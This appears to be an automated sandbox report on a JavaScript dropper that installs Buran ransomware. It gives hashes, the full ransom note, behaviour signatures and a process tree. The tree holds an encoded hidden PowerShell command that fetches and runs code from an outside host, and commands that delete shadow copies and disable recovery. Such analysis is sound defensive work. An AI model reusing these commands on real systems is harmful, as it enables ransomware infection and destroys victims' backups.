3346.zip

General
Target

3346.js

Filesize

530KB

Completed

11-08-2021 13:27

Score
10 /10
MD5

7e23a9a840725f3431ef5825c6ab6839

SHA1

b9f307ac96ded5c42d931f7c4355756164ca0123

SHA256

09eeec589e425f4da6dc1587e49f7f32c17f4c9e026b10c2360e5b3f72699ca7

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
ps1.dropper

https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php

Extracted

Path C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Family buran
Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: kd8eby0@inboxhub.net and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: kd8eby0@inboxhub.net Reserved email: kd8eby0@onionmail.org Reserved email: kd8eby0@nuke.africa Your personal ID: 12B-343-43A Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

kd8eby0@onionmail.org

kd8eby0@nuke.africa

Signatures 15

Filter: none

Defense Evasion
Discovery
Impact
Persistence
  • Buran

    Description

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Deletes shadow copies

    Description

    Ransomware often targets backup files to inhibit system recovery.

    Tags

    TTPs

    File DeletionInhibit System Recovery
  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flowpidprocess
    132764powershell.exe
    152764powershell.exe
  • Downloads MZ/PE file
  • Executes dropped EXE
    jbqvTZJz.exesmss.exesmss.exe

    Reported IOCs

    pidprocess
    3924jbqvTZJz.exe
    4040smss.exe
    1148smss.exe
  • Adds Run key to start application
    jbqvTZJz.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\smss.exe\" -start"jbqvTZJz.exe
    Key created\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\RunjbqvTZJz.exe
  • Enumerates connected drives
    smss.exe

    Description

    Attempts to read the root path of hard drives other than the default C: drive.

    TTPs

    Query RegistryPeripheral Device DiscoverySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    File opened (read-only)\??\Z:smss.exe
    File opened (read-only)\??\X:smss.exe
    File opened (read-only)\??\V:smss.exe
    File opened (read-only)\??\L:smss.exe
    File opened (read-only)\??\J:smss.exe
    File opened (read-only)\??\T:smss.exe
    File opened (read-only)\??\S:smss.exe
    File opened (read-only)\??\N:smss.exe
    File opened (read-only)\??\H:smss.exe
    File opened (read-only)\??\G:smss.exe
    File opened (read-only)\??\B:smss.exe
    File opened (read-only)\??\Y:smss.exe
    File opened (read-only)\??\R:smss.exe
    File opened (read-only)\??\P:smss.exe
    File opened (read-only)\??\O:smss.exe
    File opened (read-only)\??\K:smss.exe
    File opened (read-only)\??\E:smss.exe
    File opened (read-only)\??\W:smss.exe
    File opened (read-only)\??\U:smss.exe
    File opened (read-only)\??\Q:smss.exe
    File opened (read-only)\??\M:smss.exe
    File opened (read-only)\??\I:smss.exe
    File opened (read-only)\??\F:smss.exe
    File opened (read-only)\??\A:smss.exe
  • Legitimate hosting services abused for malware hosting/C2

    TTPs

    Web Service
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    17geoiptool.com
  • Drops file in Program Files directory
    smss.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp3-pl.xrm-mssmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-black_targetsize-40.pngsmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\ui-strings.jssmss.exe
    File createdC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXTsmss.exe
    File opened for modificationC:\Program Files\Java\jdk1.8.0_66\jre\THIRDPARTYLICENSEREADME.txtsmss.exe
    File opened for modificationC:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xmlsmss.exe
    File opened for modificationC:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial2-ppd.xrm-ms.kd8eby0.12B-343-43Asmss.exe
    File opened for modificationC:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Trial-ul-oob.xrm-mssmss.exe
    File opened for modificationC:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-125_contrast-black.pngsmss.exe
    File opened for modificationC:\Program Files\VideoLAN\VLC\lua\http\view.htmlsmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\line_2x.pngsmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\ui-strings.js.kd8eby0.12B-343-43Asmss.exe
    File opened for modificationC:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-explorer.xml.kd8eby0.12B-343-43Asmss.exe
    File createdC:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXTsmss.exe
    File opened for modificationC:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\openssl64.dlla.manifest.kd8eby0.12B-343-43Asmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_Line_White@1x.pngsmss.exe
    File opened for modificationC:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mosmss.exe
    File opened for modificationC:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\VoiceRecorderLargeTile.contrast-black_scale-200.pngsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\Movie-TVStoreLogo.scale-125.pngsmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.jssmss.exe
    File opened for modificationC:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar.kd8eby0.12B-343-43Asmss.exe
    File opened for modificationC:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\MedTile.scale-125.pngsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-16_altform-unplated_contrast-white.pngsmss.exe
    File createdC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-sl\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXTsmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.jssmss.exe
    File opened for modificationC:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Retail-ppd.xrm-ms.kd8eby0.12B-343-43Asmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-16.pngsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubBadgeLogo.scale-100_contrast-high.pngsmss.exe
    File opened for modificationC:\Program Files\Microsoft Office\root\vreg\dcf.x-none.msi.16.x-none.vreg.datsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupWideTile.scale-100.pngsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\SmallTile.scale-200.pngsmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.pngsmss.exe
    File opened for modificationC:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xmlsmss.exe
    File opened for modificationC:\Program Files\Microsoft Office\root\Office16\1033\WORD_WHATSNEW.XML.kd8eby0.12B-343-43Asmss.exe
    File opened for modificationC:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo.png.kd8eby0.12B-343-43Asmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\animations\OneNoteFRE_CreateNotes_RTL_Tablet.mp4smss.exe
    File createdC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ar-ae\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXTsmss.exe
    File opened for modificationC:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar.kd8eby0.12B-343-43Asmss.exe
    File opened for modificationC:\Program Files\Microsoft Office\root\Office16\MEDIA\SUCTION.WAVsmss.exe
    File opened for modificationC:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\index.win32.bundle.kd8eby0.12B-343-43Asmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-64_contrast-white.pngsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\1h.pngsmss.exe
    File opened for modificationC:\Program Files\Java\jdk1.8.0_66\db\README-JDK.html.kd8eby0.12B-343-43Asmss.exe
    File opened for modificationC:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-ppd.xrm-mssmss.exe
    File createdC:\Program Files\Microsoft Office\root\Office16\MSIPC\hi\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXTsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Cloud.pngsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\it_16x11.pngsmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_all.gif.kd8eby0.12B-343-43Asmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\ui-strings.jssmss.exe
    File opened for modificationC:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926306.profile.gzsmss.exe
    File opened for modificationC:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment.White@3x.pngsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Effects\Fireworks.jpgsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-48_altform-unplated.pngsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-64_altform-unplated_contrast-white.pngsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\LayersControl\Aerial.pngsmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\ui-strings.js.kd8eby0.12B-343-43Asmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-64.pngsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\ThirdPartyNotices_Arkadium.txtsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\mask\13c.pngsmss.exe
    File opened for modificationC:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailSmallTile.scale-100.pngsmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\ui-strings.jssmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\ui-strings.jssmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.pngsmss.exe
    File opened for modificationC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js.kd8eby0.12B-343-43Asmss.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Interacts with shadow copies
    vssadmin.exevssadmin.exe

    Description

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    Tags

    TTPs

    File DeletionInhibit System Recovery

    Reported IOCs

    pidprocess
    3124vssadmin.exe
    3272vssadmin.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pidprocess
    2764powershell.exe
    2764powershell.exe
    2764powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exejbqvTZJz.exeWMIC.exeWMIC.exevssvc.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege2764powershell.exe
    Token: SeDebugPrivilege3924jbqvTZJz.exe
    Token: SeDebugPrivilege3924jbqvTZJz.exe
    Token: SeIncreaseQuotaPrivilege2976WMIC.exe
    Token: SeSecurityPrivilege2976WMIC.exe
    Token: SeTakeOwnershipPrivilege2976WMIC.exe
    Token: SeLoadDriverPrivilege2976WMIC.exe
    Token: SeSystemProfilePrivilege2976WMIC.exe
    Token: SeSystemtimePrivilege2976WMIC.exe
    Token: SeProfSingleProcessPrivilege2976WMIC.exe
    Token: SeIncBasePriorityPrivilege2976WMIC.exe
    Token: SeCreatePagefilePrivilege2976WMIC.exe
    Token: SeBackupPrivilege2976WMIC.exe
    Token: SeRestorePrivilege2976WMIC.exe
    Token: SeShutdownPrivilege2976WMIC.exe
    Token: SeDebugPrivilege2976WMIC.exe
    Token: SeSystemEnvironmentPrivilege2976WMIC.exe
    Token: SeRemoteShutdownPrivilege2976WMIC.exe
    Token: SeUndockPrivilege2976WMIC.exe
    Token: SeManageVolumePrivilege2976WMIC.exe
    Token: 332976WMIC.exe
    Token: 342976WMIC.exe
    Token: 352976WMIC.exe
    Token: 362976WMIC.exe
    Token: SeIncreaseQuotaPrivilege2892WMIC.exe
    Token: SeSecurityPrivilege2892WMIC.exe
    Token: SeTakeOwnershipPrivilege2892WMIC.exe
    Token: SeLoadDriverPrivilege2892WMIC.exe
    Token: SeSystemProfilePrivilege2892WMIC.exe
    Token: SeSystemtimePrivilege2892WMIC.exe
    Token: SeProfSingleProcessPrivilege2892WMIC.exe
    Token: SeIncBasePriorityPrivilege2892WMIC.exe
    Token: SeCreatePagefilePrivilege2892WMIC.exe
    Token: SeBackupPrivilege2892WMIC.exe
    Token: SeRestorePrivilege2892WMIC.exe
    Token: SeShutdownPrivilege2892WMIC.exe
    Token: SeDebugPrivilege2892WMIC.exe
    Token: SeSystemEnvironmentPrivilege2892WMIC.exe
    Token: SeRemoteShutdownPrivilege2892WMIC.exe
    Token: SeUndockPrivilege2892WMIC.exe
    Token: SeManageVolumePrivilege2892WMIC.exe
    Token: 332892WMIC.exe
    Token: 342892WMIC.exe
    Token: 352892WMIC.exe
    Token: 362892WMIC.exe
    Token: SeBackupPrivilege2352vssvc.exe
    Token: SeRestorePrivilege2352vssvc.exe
    Token: SeAuditPrivilege2352vssvc.exe
    Token: SeIncreaseQuotaPrivilege2892WMIC.exe
    Token: SeSecurityPrivilege2892WMIC.exe
    Token: SeTakeOwnershipPrivilege2892WMIC.exe
    Token: SeLoadDriverPrivilege2892WMIC.exe
    Token: SeSystemProfilePrivilege2892WMIC.exe
    Token: SeSystemtimePrivilege2892WMIC.exe
    Token: SeProfSingleProcessPrivilege2892WMIC.exe
    Token: SeIncreaseQuotaPrivilege2976WMIC.exe
    Token: SeIncBasePriorityPrivilege2892WMIC.exe
    Token: SeSecurityPrivilege2976WMIC.exe
    Token: SeCreatePagefilePrivilege2892WMIC.exe
    Token: SeBackupPrivilege2892WMIC.exe
    Token: SeTakeOwnershipPrivilege2976WMIC.exe
    Token: SeRestorePrivilege2892WMIC.exe
    Token: SeLoadDriverPrivilege2976WMIC.exe
    Token: SeShutdownPrivilege2892WMIC.exe
  • Suspicious use of WriteProcessMemory
    wscript.execmd.exepowershell.exejbqvTZJz.exesmss.execmd.execmd.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 568 wrote to memory of 2960568wscript.execmd.exe
    PID 568 wrote to memory of 2960568wscript.execmd.exe
    PID 2960 wrote to memory of 27642960cmd.exepowershell.exe
    PID 2960 wrote to memory of 27642960cmd.exepowershell.exe
    PID 2764 wrote to memory of 39242764powershell.exejbqvTZJz.exe
    PID 2764 wrote to memory of 39242764powershell.exejbqvTZJz.exe
    PID 2764 wrote to memory of 39242764powershell.exejbqvTZJz.exe
    PID 3924 wrote to memory of 40403924jbqvTZJz.exesmss.exe
    PID 3924 wrote to memory of 40403924jbqvTZJz.exesmss.exe
    PID 3924 wrote to memory of 40403924jbqvTZJz.exesmss.exe
    PID 3924 wrote to memory of 35883924jbqvTZJz.exenotepad.exe
    PID 3924 wrote to memory of 35883924jbqvTZJz.exenotepad.exe
    PID 3924 wrote to memory of 35883924jbqvTZJz.exenotepad.exe
    PID 3924 wrote to memory of 35883924jbqvTZJz.exenotepad.exe
    PID 3924 wrote to memory of 35883924jbqvTZJz.exenotepad.exe
    PID 3924 wrote to memory of 35883924jbqvTZJz.exenotepad.exe
    PID 4040 wrote to memory of 18244040smss.execmd.exe
    PID 4040 wrote to memory of 18244040smss.execmd.exe
    PID 4040 wrote to memory of 18244040smss.execmd.exe
    PID 4040 wrote to memory of 36044040smss.execmd.exe
    PID 4040 wrote to memory of 36044040smss.execmd.exe
    PID 4040 wrote to memory of 36044040smss.execmd.exe
    PID 4040 wrote to memory of 19004040smss.execmd.exe
    PID 4040 wrote to memory of 19004040smss.execmd.exe
    PID 4040 wrote to memory of 19004040smss.execmd.exe
    PID 4040 wrote to memory of 37324040smss.execmd.exe
    PID 4040 wrote to memory of 37324040smss.execmd.exe
    PID 4040 wrote to memory of 37324040smss.execmd.exe
    PID 4040 wrote to memory of 30324040smss.execmd.exe
    PID 4040 wrote to memory of 30324040smss.execmd.exe
    PID 4040 wrote to memory of 30324040smss.execmd.exe
    PID 4040 wrote to memory of 28324040smss.execmd.exe
    PID 4040 wrote to memory of 28324040smss.execmd.exe
    PID 4040 wrote to memory of 28324040smss.execmd.exe
    PID 4040 wrote to memory of 11484040smss.exesmss.exe
    PID 4040 wrote to memory of 11484040smss.exesmss.exe
    PID 4040 wrote to memory of 11484040smss.exesmss.exe
    PID 3032 wrote to memory of 31243032cmd.exevssadmin.exe
    PID 3032 wrote to memory of 31243032cmd.exevssadmin.exe
    PID 3032 wrote to memory of 31243032cmd.exevssadmin.exe
    PID 2832 wrote to memory of 28922832cmd.exeWMIC.exe
    PID 2832 wrote to memory of 28922832cmd.exeWMIC.exe
    PID 2832 wrote to memory of 28922832cmd.exeWMIC.exe
    PID 1824 wrote to memory of 29761824cmd.exeWMIC.exe
    PID 1824 wrote to memory of 29761824cmd.exeWMIC.exe
    PID 1824 wrote to memory of 29761824cmd.exeWMIC.exe
    PID 2832 wrote to memory of 32722832cmd.exevssadmin.exe
    PID 2832 wrote to memory of 32722832cmd.exevssadmin.exe
    PID 2832 wrote to memory of 32722832cmd.exevssadmin.exe
Processes 18
  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\3346.js
    Suspicious use of WriteProcessMemory
    PID:568
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
      Suspicious use of WriteProcessMemory
      PID:2960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:2764
        • C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe
          "C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe"
          Executes dropped EXE
          Adds Run key to start application
          Suspicious use of AdjustPrivilegeToken
          Suspicious use of WriteProcessMemory
          PID:3924
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start
            Executes dropped EXE
            Enumerates connected drives
            Suspicious use of WriteProcessMemory
            PID:4040
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
              Suspicious use of WriteProcessMemory
              PID:1824
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                wmic shadowcopy delete
                Suspicious use of AdjustPrivilegeToken
                PID:2976
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
              PID:3604
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
              PID:1900
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
              PID:3732
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 0
              Executes dropped EXE
              Drops file in Program Files directory
              PID:1148
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
              Suspicious use of WriteProcessMemory
              PID:2832
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                wmic shadowcopy delete
                Suspicious use of AdjustPrivilegeToken
                PID:2892
              • C:\Windows\SysWOW64\vssadmin.exe
                vssadmin delete shadows /all /quiet
                Interacts with shadow copies
                PID:3272
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
              Suspicious use of WriteProcessMemory
              PID:3032
              • C:\Windows\SysWOW64\vssadmin.exe
                vssadmin delete shadows /all /quiet
                Interacts with shadow copies
                PID:3124
          • C:\Windows\SysWOW64\notepad.exe
            notepad.exe
            PID:3588
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    Suspicious use of AdjustPrivilegeToken
    PID:2352
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Execution
          Exfiltration
            Initial Access
              Lateral Movement
                Privilege Escalation
                  Replay Monitor
                  00:00 00:00
                  Downloads
                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

                    MD5

                    3903600a51d4f986b4302a602d42634b

                    SHA1

                    0ffcdcba49bfe7ed35695bc6092d72eae2db457b

                    SHA256

                    b509c38c1328732e6b2cf75fe5baa76764a6c5aaea721da222b5caaaac4ecc8e

                    SHA512

                    459d03ff9961ebf926e591ed4fd08cfd0f5ec1518b16427ad7b2f1bdf5c6f2188b1f288dafcbcf4620a8a7c53ec4c995fc31cf1329bebf6dec7cc88ae33a7b4f

                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

                    MD5

                    3c9ad8d57554c33ab612c69aef4ce7e1

                    SHA1

                    93f176d8825c9b8b70bb040079b4497457d04b82

                    SHA256

                    d21639d8e234be42f0db58da90ef5852064bd2b98f88c7c848d672bf8bbd1ece

                    SHA512

                    94791fcc6564db7929e2f3ea7c1c093872df24728561320e5341b9e8b7088e2b53a3c71e6e4bcd34663860a490875a7c285e9ba0990afb83388da9214af1362e

                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                    MD5

                    3e9f22cc690a8f0a85c77641e868fa63

                    SHA1

                    fe20510f5f24bdcf66183653b9b8b4f12581530c

                    SHA256

                    8f71c8b1d3dfc7997d945b8ffa1331874246cb0fc64f56eb2a25c9fa0b978ef9

                    SHA512

                    a96110ee91309ab8a15df7e5ecef220cfc2289180c54c789ceb148cc6a74c2c1339a3271267611ee963556d2c8c824d3274bcdb92c7476bb10a7553ade121e62

                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

                    MD5

                    5853495819c12953e611cca9d1df20a6

                    SHA1

                    c2ab03e520baca02509d13b874f98a11eccbf97a

                    SHA256

                    af4ad165f956d9f4b0b28fe3cf109d22e037152261bb132b01759abbfff193c4

                    SHA512

                    1e7b4a55632b53ceb18ab909df68fe8e21e4a3e50b6b4b7e44da3e662da2b6f1142ad2aa2e022f8efe0702fbaaf05eb8767df6dae76599973fa8b10f58e2be44

                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

                    MD5

                    0e8dd2e802d289d7fad334886926dfe0

                    SHA1

                    3c7e37b0574f1af35590b516a5e1c85ef25ca6e3

                    SHA256

                    982c8039205a17211233ad08a1e271fa8370f263d0bcf633695e5ec7b139380d

                    SHA512

